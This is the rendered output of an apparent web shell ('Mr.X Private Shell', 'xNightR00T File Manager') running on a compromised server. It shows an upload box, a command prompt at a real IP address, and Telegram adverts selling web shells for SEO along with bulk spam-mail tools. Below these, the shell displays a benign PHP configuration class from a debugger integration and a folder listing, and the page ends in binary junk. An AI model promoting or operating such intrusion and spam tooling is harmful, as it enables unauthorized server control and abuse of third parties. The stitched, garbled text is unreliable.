xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace StudioIntegration;

use Zend\Db\Sql\Ddl\Column\Integer;

class Configuration
{
    /**
     * @var Configuration
     */
    private static $instance;

    /**
     * @var boolean
     */
    private $autoDetect;

    /**
     * @var Integer
     */
    private $autoDetectionPort;

    /**
     * @var boolean
     */
    private $browserDetect;

    /**
     * @var boolean
     */
    private $useSsl;

    /**
     * @var boolean
     */
    private $useRemote;

    /**
     * @var boolean
     */
    private $breakOnFirstLine;

    /**
     * @var integer
     */
    private $port;

    /**
     * @var string
     */
    private $host;

    /**
     * @var string
     */
    private $brwoserHost;

    /**
     * @var integer
     */
    private $timeout;

    /**
     * @return string
     */
    public function getHost()
    {
        return $this->host;
    }

    /**
     * @return string
     */
    public function getBrowserHost()
    {
        return (string) $this->brwoserHost;
    }

    /**
     * @return string
     */
    public function getCurrentHost()
    {
        if (!$this->autoDetect) {
            return ($this->browserDetect) ? (string) $this->brwoserHost : (string) $this->host;
        }
        return (string) $this->host;
    }

    /**
     * @return boolean
     */
    public function getAutoDetect()
    {
        return (boolean) $this->autoDetect;
    }

    /**
     * @return boolean
     */
    public function getAutoDetectionPort()
    {
        return $this->autoDetectionPort;
    }

    /**
     * @return boolean
     */
    public function getBrowserDetect()
    {
        return (boolean) $this->browserDetect;
    }

    /**
     * @param string $browserHost
     */
    public function setBrowserHost($browserHost)
    {
        $this->brwoserHost = $browserHost;
    }

    /**
     * @return integer
     */
    public function getPort()
    {
        return (integer) $this->port;
    }

    /**
     * @return boolean
     */
    public function getSsl()
    {
        return (boolean) $this->useSsl;
    }

    /**
     * @return boolean
     */
    public function getUseRemote()
    {
        return (boolean) $this->useRemote;
    }

    /**
     * @return boolean
     */
    public function getBrakeOnFirstLine()
    {
        return (boolean) $this->breakOnFirstLine;
    }

    /**
     * @return the $timeout
     */
    public function getTimeout()
    {
        return $this->timeout;
    }

    /**
     * @param number $timeout
     */
    public function setTimeout($timeout)
    {
        $this->timeout = $timeout;
    }

    /**
     * @param boolean $autoDetect
     * @return Configuration
     */
    public function setAutoDetect($autoDetect)
    {
        $this->autoDetect = $autoDetect;
        return $this;
    }

    /**
     * @param boolean $autoDetectionPort
     * @return Configuration
     */
    public function setAutoDetectionPort($autoDetectionPort)
    {
        $this->autoDetectionPort = $autoDetectionPort;
        return $this;
    }

    /**
     * @param boolean $browserDetect
     * @return Configuration
     */
    public function setBrowserDetect($browserDetect)
    {
        $this->browserDetect = $browserDetect;
        return $this;
    }

    /**
     * @param string $host
     * @param integer $port
     * @param boolean $useSsl
     */
    public function setConfiguration($host = null, $port = null, $useSsl = null, $breakOnFirstLine = null,
                                     $useRemote = null)
    {
        if (!empty($host)) {
            $this->host = (string) $host;
        }
        if (!empty($port)) {
            $this->port = (integer) $port;
        }
        if (('0' === $useSsl) || (!empty($useSsl))) {
            $this->useSsl = (boolean) $useSsl;
        }
        if (('0' === $breakOnFirstLine) || (!empty($breakOnFirstLine))) {
            $this->breakOnFirstLine = (boolean) $breakOnFirstLine;
        }
        if (('0' === $useRemote) || (!empty($useRemote))) {
            $this->useRemote = (boolean) $useRemote;
        }
    }

    public static function importZscmInstance(Configuration $suggestedConfiguration)
    {
        self::$instance = new Configuration();
        self::$instance->setBrowserHost($suggestedConfiguration->getBrowserHost());
        return self::$instance;
    }

    /**
     * Singleton factory method
     * Build a "Configuration" object base on arguments or data from configuration file
     *
     * @return Configuration
     */
    public static function getInstance()
    {
        if (is_null(self::$instance)) {
            self::$instance = new Configuration();
        }
        return self::$instance;
    }

    /**
     * Resets all object properties of the singleton instance
     * @return void
     */
    public static function resetInstance()
    {
        self::$instance = null;
    }

    /**
     * @return string
     */
    public static function getBrowserRemoterAddress()
    {
        if (!isset($_SERVER['REMOTE_ADDR'])) {
            return '127.0.0.1';
        }

        $browserRemoteAddress = $_SERVER['REMOTE_ADDR'];
        // Special case of IPv6 local loopback
        if ('::1' == $browserRemoteAddress) {
            $browserRemoteAddress = '127.0.0.1';
        }
        // Special case of IPv6 which holds an IPv4 address (e.g. ::ffff:10.1.1.1) bug #30319
        if (0 === strpos($browserRemoteAddress, '::ffff:')) {
            $browserRemoteAddress = substr($browserRemoteAddress, 7);
        }
        return $browserRemoteAddress;
    }

    public function __construct()
    {
        $this->brwoserHost = Configuration::getBrowserRemoterAddress();
    }
}

Filemanager

Name Type Size Permission Actions
Client Folder 0755
Controller Folder 0755
Debugger Folder 0755
Form Folder 0755
Resources Folder 0755
Configuration.php File 5.57 KB 0644
ConfigurationHydrator.php File 1.18 KB 0644
Mapper.php File 1.45 KB 0644
Model.php File 15.78 KB 0644
MonitorIssueGroupData.php File 2.51 KB 0644
exportIssue.php File 15.7 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1